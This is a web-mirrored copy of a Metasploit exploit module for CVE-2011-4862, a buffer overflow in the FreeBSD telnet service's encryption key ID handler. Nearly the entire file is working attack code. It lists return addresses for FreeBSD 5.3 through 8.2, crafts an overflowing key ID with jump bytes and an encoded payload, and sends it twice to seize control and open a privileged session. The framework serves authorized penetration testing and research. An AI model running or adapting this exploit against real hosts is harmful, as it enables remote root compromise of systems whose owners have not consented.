Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
19670 views
1
# -*- coding: binary -*-

2


3
##

4
# This module requires Metasploit: https://metasploit.com/download

5
# Current source: https://github.com/rapid7/metasploit-framework

6
##

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = GreatRanking

10


11
  include Msf::Exploit::Remote::Telnet

12
  include Msf::Exploit::BruteTargets

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',

19
        'Description' => %q{

20
          This module exploits a buffer overflow in the encryption option handler of the

21
          FreeBSD telnet service.

22
        },

23
        'Author' => [

24
          'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>',

25
          'Brandon Perry <bperry.volatile[at]gmail.com>',

26
          'Dan Rosenberg',

27
          'hdm'

28
        ],

29
        'License' => MSF_LICENSE,

30
        'References' => [

31
          ['CVE', '2011-4862'],

32
          ['OSVDB', '78020'],

33
          ['BID', '51182'],

34
          ['EDB', '18280']

35
        ],

36
        'Privileged' => true,

37
        'Platform' => 'bsd',

38
        'Arch' => [ ARCH_X86 ],

39
        'Payload' => {

40
          'Space' => 128,

41
          'BadChars' => "\x00"

42
        },

43


44
        'Targets' => [

45
          [ 'Automatic', {} ],

46
          [ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx

47
          [ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx

48
          [ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx

49
          [ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx

50
          [ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx

51
          [ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx

52
          [ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx

53
          [ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx

54
          # [ 'FreeBSD 5.4',         { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)

55
          [ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return

56
          # Versions 5.2 and below do not support encyption

57
        ],

58
        'DefaultTarget' => 0,

59
        'DisclosureDate' => '2011-12-23',

60
        'Notes' => {

61
          'Stability' => [ CRASH_SERVICE_RESTARTS, ],

62
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],

63
          'Reliability' => [ REPEATABLE_SESSION, ]

64
        }

65
      )

66
    )

67
  end

68


69
  def exploit_target(target)

70
    connect

71
    banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)

72
    vprint_status(banner_sanitized)

73


74
    enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"

75
    enc_keyid = "\xff\xfa\x26\x07"

76
    end_suboption = "\xff\xf0"

77


78
    # Telnet protocol requires 0xff to be escaped with another

79
    penc = payload.encoded.gsub("\xff", "\xff\xff")

80


81
    key_id = Rex::Text.rand_text_alphanumeric(400)

82
    key_id[0, 2] = "\xeb\x76"

83
    key_id[72, 4] = [ target['Ret'] - 20 ].pack('V')

84
    key_id[76, 4] = [ target['Ret'] ].pack('V')

85


86
    # Some of these bytes can get mangled, jump over them

87
    key_id[80, 112] = Rex::Text.rand_text_alphanumeric(112)

88


89
    # Bounce to the real payload (avoid corruption)

90
    key_id[120, 2] = "\xeb\x46"

91


92
    # The actual payload

93
    key_id[192, penc.length] = penc

94


95
    # Create the Key ID command

96
    sploit = enc_keyid + key_id + end_suboption

97


98
    # Initiate encryption

99
    sock.put(enc_init)

100


101
    # Wait for a successful response

102
    loop do

103
      data = begin

104
        sock.get_once(-1, 5)

105
      rescue StandardError

106
        nil

107
      end

108
      if !data

109
        fail_with(Failure::Unknown, 'This system does not support encryption')

110
      end

111
      break if data.index("\xff\xfa\x26\x02\x01")

112
    end

113


114
    # The first request smashes the pointer

115
    print_status('Sending first payload')

116
    sock.put(sploit)

117


118
    # Make sure the server replied to the first request

119
    data = sock.get_once(-1, 5)

120
    unless data

121
      print_status('Server did not respond to first payload')

122
      return

123
    end

124


125
    # Some delay between each request seems necessary in some cases

126
    ::IO.select(nil, nil, nil, 0.5)

127


128
    # The second request results in the pointer being called

129
    print_status('Sending second payload...')

130
    sock.put(sploit)

131


132
    handler

133


134
    ::IO.select(nil, nil, nil, 0.5)

135
    disconnect

136
  end

137
end

138


139